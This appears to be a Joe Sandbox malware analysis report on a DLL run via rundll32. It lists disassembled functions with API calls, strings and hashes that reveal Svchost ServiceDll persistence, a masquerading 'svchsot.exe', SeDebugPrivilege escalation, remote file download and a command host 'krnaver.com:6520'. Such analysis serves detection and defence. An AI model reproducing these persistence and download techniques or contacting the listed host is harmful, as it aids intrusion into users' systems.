                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: bad d_code
                                                • API String ID: 0-2582332627
                                                • Opcode ID: 327568906bed5a48e17ba06d2ddebb37f7008130ae1c85090ddd3765f816ae03
                                                • Instruction ID: 5051aabb8c8f42bf7f0ad7204590e299647211c71809f1c43ca0660982d1e5e8
                                                • Opcode Fuzzy Hash: 327568906bed5a48e17ba06d2ddebb37f7008130ae1c85090ddd3765f816ae03
                                                • Instruction Fuzzy Hash: 1541E3751082429FE315EF69D840EFF77E6EF88284F45846EF8858B205EB70E905C7A2
                                                Function 1000F500 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d8292dab876d3856fe77b003576302b6b8b57554ab1a7fa92ce49e5c0b0693b
                                                • Instruction ID: aa392b9c8528f05fc8196833d7f7bb75810528e03076ef8e7fbf563dca482b86
                                                • Opcode Fuzzy Hash: 5d8292dab876d3856fe77b003576302b6b8b57554ab1a7fa92ce49e5c0b0693b
                                                • Instruction Fuzzy Hash: C8315222BB90A207E354CEBD9CC4277B793D7CA246B6DC67CD588C7A1EC83AD8075250
                                                Function 10006330 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211filesleepinjectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • c:\windows\system32\drivers\%s\%s, xrefs: 10006447
                                                • %s\%s, xrefs: 100063BB
                                                • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 1000651F
                                                • c:\windows\system32\drivers\%s, xrefs: 1000642E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                                • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                                • API String ID: 3377497938-1917988604
                                                • Opcode ID: 0dba42889dc0f8d7b8647c302bd0f7389d4fc49d2d206becb2fc758216d159f0
                                                • Instruction ID: c69659560551726c28aa303df1a51e06c88e31100adfc53adbd4189e51445300
                                                • Opcode Fuzzy Hash: 0dba42889dc0f8d7b8647c302bd0f7389d4fc49d2d206becb2fc758216d159f0
                                                • Instruction Fuzzy Hash: C661C175204345AFE724CB64CC85BEAB7E6EBCC310F048A2CF64597295DB78E6488652
                                                Function 1000821F Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 180registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • wsprintfA.USER32 ref: 1000826D
                                                • lstrlen.KERNEL32(?), ref: 1000828C
                                                • wsprintfA.USER32 ref: 100082C3
                                                • _CxxThrowException.MSVCRT ref: 100082F2
                                                • SetLastError.KERNEL32(00000000), ref: 1000831C
                                                • _CxxThrowException.MSVCRT(?), ref: 10008336
                                                • RegCloseKey.ADVAPI32(?), ref: 1000833F
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10008391
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 100083AB
                                                • SetLastError.KERNEL32(00000000,?,00000000,00000007), ref: 100083CE
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 100083E8
                                                • GetLastError.KERNEL32(?,100147E8,?,00000000,00000007), ref: 100083F9
                                                Strings
                                                • Description, xrefs: 1000829B
                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 1000835A
                                                • ServiceDll, xrefs: 1000830D
                                                • RegSetValueEx(Svchost\krnlsrvc), xrefs: 100083E1
                                                • RegOpenKeyEx(Svchost), xrefs: 100083A4
                                                • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 100082BD
                                                • RegSetValueEx(ServiceDll), xrefs: 1000832F
                                                • SYSTEM\CurrentControlSet\Services\%s, xrefs: 10008267
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExceptionThrow$ErrorLast$wsprintf$CloseOpenlstrlen
                                                • String ID: Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                • API String ID: 3773726178-700256109
                                                • Opcode ID: e85c466ea40d437f1592b3b7cade2b8fe84d779c0fe544d688e4eb843793efc8
                                                • Instruction ID: c272cb4ee7fe1a7dac79bfe138246f1ba179634c1733e746b5ff744f59549045
                                                • Opcode Fuzzy Hash: e85c466ea40d437f1592b3b7cade2b8fe84d779c0fe544d688e4eb843793efc8
                                                • Instruction Fuzzy Hash: 7951AE71A00118ABEB15CBA4CC85FEE77E9FB88750F044219FA06A7280DF74DE81CB60
                                                Function 10006A50 Relevance: 36.8, APIs: 7, Strings: 14, Instructions: 96stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • wsprintfA.USER32 ref: 10006A7E
                                                • GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
                                                • GetModuleFileNameA.KERNEL32(10000000,c:\agtve\yhnvs.dll,00000104), ref: 10006AA7
                                                • strrchr.MSVCRT ref: 10006AD5
                                                • wsprintfA.USER32 ref: 10006AED
                                                • wsprintfA.USER32 ref: 10006AFE
                                                • wsprintfA.USER32 ref: 10006B0F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: wsprintf$FileModuleName$strrchr
                                                • String ID: %s.txt$%s\ReadMe.txt$%s\version.txt$09121307$09121307.txt$ECF4BBEA1588$M%s$Mkrnaver.com:6520$c:\agtve$c:\agtve\ReadMe.txt$c:\agtve\version.txt$c:\agtve\yhnvs.dll$c:\windows\SysWOW64\rundll32.exe$krnaver.com:6520
                                                • API String ID: 1444062329-336646113
                                                • Opcode ID: fd1de15f43c206347c2ac9a46dc33d443f248e52294ce5f81c6693700653e1e0
                                                • Instruction ID: 04d4b27928b3db94c91fa8a3f6c5c52e8812e2580820e9d4d8c6f0595a90b4de
                                                • Opcode Fuzzy Hash: fd1de15f43c206347c2ac9a46dc33d443f248e52294ce5f81c6693700653e1e0
                                                • Instruction Fuzzy Hash: D521F671640A116FE318DB798C41FAA7AD1EB88320F554319F7169F2C1CBB4DD85C654
                                                Function 1000F6F0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 106COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: _mbsicmp
                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                • API String ID: 1961004622-51310709
                                                • Opcode ID: 808ecf9ba61cca7d35e01d6ffb931e7b3765451d2e58726d03ba59bcbd5b0318
                                                • Instruction ID: ee2a091052f8c3b86a9c7290411a3b224c3c8ade4836fbf502385ceb4bcfd2c4
                                                • Opcode Fuzzy Hash: 808ecf9ba61cca7d35e01d6ffb931e7b3765451d2e58726d03ba59bcbd5b0318
                                                • Instruction Fuzzy Hash: 6B21A22260816221BA00B52D7C406EE93C8CFE20E6B07403BFD58D9A19FB55DDC3A4E7
                                                Function 10005030 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 10005069
                                                  • Part of subcall function 10004DA0: CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                  • Part of subcall function 10004DA0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                  • Part of subcall function 10004DA0: time.MSVCRT(00000000), ref: 10004E7F
                                                  • Part of subcall function 10004DA0: _localtime32.MSVCRT(?), ref: 10004E8E
                                                  • Part of subcall function 10004DA0: strftime.MSVCRT ref: 10004EA1
                                                  • Part of subcall function 10004DA0: vsprintf.MSVCRT ref: 10004EF3
                                                  • Part of subcall function 10004DA0: sprintf.MSVCRT ref: 10004F13
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                                • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                                • API String ID: 3192119092-4191049792
                                                • Opcode ID: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
                                                • Instruction ID: 7fa6494ac43d5dcc9c5c53410437834f8a30d40188a99b7aa6c5cd6ec2dc6e24
                                                • Opcode Fuzzy Hash: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
                                                • Instruction Fuzzy Hash: D8112BB26402147BF3119754EC8ABEA3348DF84362F414131F70496181DA76E5A8C6B7
                                                Function 1000A9F0 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 338COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID: JS0yNHMgJS0xNXMgJXMgXHJcbg==$JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==$JS0yNHMgJS0xNXMgXHJcbg==$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                                • API String ID: 71445658-1435378120
                                                • Opcode ID: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
                                                • Instruction ID: 3f2a93cd4c3d7343f0a580605e2b8078640624975132d2b922564d29651d2999
                                                • Opcode Fuzzy Hash: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
                                                • Instruction Fuzzy Hash: 7CC1A8B6900158AFEB14CF94DC41FDFB3B9EB89350F004299F619A7184EB74AE84CB91
                                                Function 10006710 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 96threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10006090: strrchr.MSVCRT ref: 1000610E
                                                  • Part of subcall function 10006090: strncpy.MSVCRT ref: 10006125
                                                  • Part of subcall function 10006090: strncpy.MSVCRT ref: 1000612F
                                                  • Part of subcall function 10006090: GetSystemInfo.KERNEL32(?), ref: 10006139
                                                  • Part of subcall function 10006090: GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
                                                  • Part of subcall function 10006090: OpenProcessToken.ADVAPI32(00000000), ref: 10006161
                                                  • Part of subcall function 10006090: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
                                                  • Part of subcall function 10006090: AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
                                                  • Part of subcall function 10006090: CloseHandle.KERNEL32(00000010), ref: 100061B2
                                                  • Part of subcall function 10006090: sscanf.MSVCRT ref: 100061DD
                                                • wsprintfA.USER32 ref: 10006752
                                                  • Part of subcall function 100061F0: strchr.MSVCRT ref: 10006246
                                                • wsprintfA.USER32 ref: 100067B8
                                                • wsprintfA.USER32 ref: 100067D1
                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 100067DC
                                                  • Part of subcall function 10005130: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,100094AF,?,?,?), ref: 10005149
                                                  • Part of subcall function 10005130: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000516B
                                                  • Part of subcall function 10005130: CloseHandle.KERNEL32(00000000), ref: 10005172
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000681A
                                                • CreateThread.KERNEL32(00000000,00000000,100065E0,00000000,00000000,00000000), ref: 10006841
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateProcesswsprintf$CloseFileHandleOpenTokenstrncpy$AdjustCurrentDirectoryInfoLookupPrivilegePrivilegesSystemThreadValueWritesscanfstrchrstrrchr
                                                • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                • API String ID: 3642037362-1421401311
                                                • Opcode ID: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
                                                • Instruction ID: 4b2977ad490d08696dca791de939d207079566f8b39031e4ddb8eae90f5a8ad1
                                                • Opcode Fuzzy Hash: 959fb8fba947e54388e467c1008752361763f84d015db73d1a953f87127b373f
                                                • Instruction Fuzzy Hash: FA31BF71504344BBE321CBA8CD84AEBBB9AEB8D340F40492DF25597242DB35E944CB63
                                                Function 10011A56 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 10011AFC
                                                • GetLastError.KERNEL32 ref: 10011B08
                                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 10011B3B
                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10011B4D
                                                • LocalAlloc.KERNEL32(00000040,00000008), ref: 10011B61
                                                • FreeLibrary.KERNEL32(00000000), ref: 10011B7E
                                                • GetProcAddress.KERNEL32(?,?), ref: 10011BDF
                                                • GetLastError.KERNEL32 ref: 10011BEB
                                                • RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 10011C1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
                                                • String ID: $
                                                • API String ID: 991255547-3993045852
                                                • Opcode ID: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
                                                • Instruction ID: a354a1ddeb452cab2ad2ab051f5ed65d06ba3f599703faf405cad435a4b3e081
                                                • Opcode Fuzzy Hash: a73b7cc8c625f911e0734331049b328756f35cc78c5a687038707bc00ce3fec9
                                                • Instruction Fuzzy Hash: BA612DB5A0420A9FEB19CF99C8C1AEA77F5EB48350F11812DE905DB251E770EE84CB60
                                                Function 10008A70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 1000769B
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 100076BF
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076CE
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 100076DA
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 100076E9
                                                  • Part of subcall function 100075F0: strncpy.MSVCRT ref: 100076F2
                                                  • Part of subcall function 100075F0: strstr.MSVCRT ref: 1000772F
                                                  • Part of subcall function 100075F0: strcspn.MSVCRT ref: 10007742
                                                  • Part of subcall function 10006B90: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10006BA7
                                                  • Part of subcall function 10006F20: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
                                                  • Part of subcall function 10006F20: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
                                                  • Part of subcall function 10006F20: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062
                                                • send.WS2_32(00000000,?,00000128,00000000), ref: 10008ADF
                                                • closesocket.WS2_32(00000000), ref: 10008AEB
                                                • select.WS2_32 ref: 10008B41
                                                • closesocket.WS2_32(00000000), ref: 10008C33
                                                • InterlockedExchange.KERNEL32(1001B6A0,00000001), ref: 10008C44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedLanguageMemoryOpenStatusSystemselectsendsetsockoptstrncpy
                                                • String ID: SeShutdownPrivilege$zip
                                                • API String ID: 619725691-4289258210
                                                • Opcode ID: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
                                                • Instruction ID: 7a5603a2a2216d2e1622d78d4c03b43238dfd1876f0237c8316e7908159126a5
                                                • Opcode Fuzzy Hash: b5eb4e8b9dd09d5d0053c07554e98b6b0746b7bdf66f2196c35ecf5b0e9c48ff
                                                • Instruction Fuzzy Hash: 0551D6B1544305AAF320DB648C85FEB76E9FB843D0F104929FA49D91C6EB74E644CBB2
                                                Function 10007250 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 131libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,?), ref: 10007267
                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 10007270
                                                • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 10007299
                                                • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 100072A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                • API String ID: 2574300362-1569318151
                                                • Opcode ID: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
                                                • Instruction ID: c0467908c50afa1d83c3b06bf8344a948e458b4db3363e6c89df874e13e7bd38
                                                • Opcode Fuzzy Hash: 04083978eb23d12a34f0fee697af90656df796dc382c12a5cf3d9f7be74f32bc
                                                • Instruction Fuzzy Hash: CC41CC31A0051C6BDB25C6B8CC51BEF7666FB88320F550369F716AB2C1DAF15E45CB44
                                                Function 10008440 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 30synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10004F60: GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                  • Part of subcall function 10004F60: OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                  • Part of subcall function 10004F60: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                  • Part of subcall function 10004F60: AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                  • Part of subcall function 10004F60: CloseHandle.KERNEL32 ref: 10004FD5
                                                • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,100084BC), ref: 1000845B
                                                • GetLastError.KERNEL32(?,100084BC), ref: 10008463
                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,100084BC), ref: 1000848D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,100084BC), ref: 10008494
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                                • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                                • API String ID: 3631164735-4205529783
                                                • Opcode ID: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                • Instruction ID: 925e2da293242ab0c133c8592058369d05a2f9f499b66df2af7b6b931c45f916
                                                • Opcode Fuzzy Hash: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
                                                • Instruction Fuzzy Hash: 42E09275D10060A3F912B760ACCDADE3A21D78A795F074130F709E5156DF34CAD182B2
                                                Function 1000F870 Relevance: 12.2, APIs: 8, Instructions: 169fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F8EB
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F90B
                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F922
                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F92B
                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F93C
                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F95C
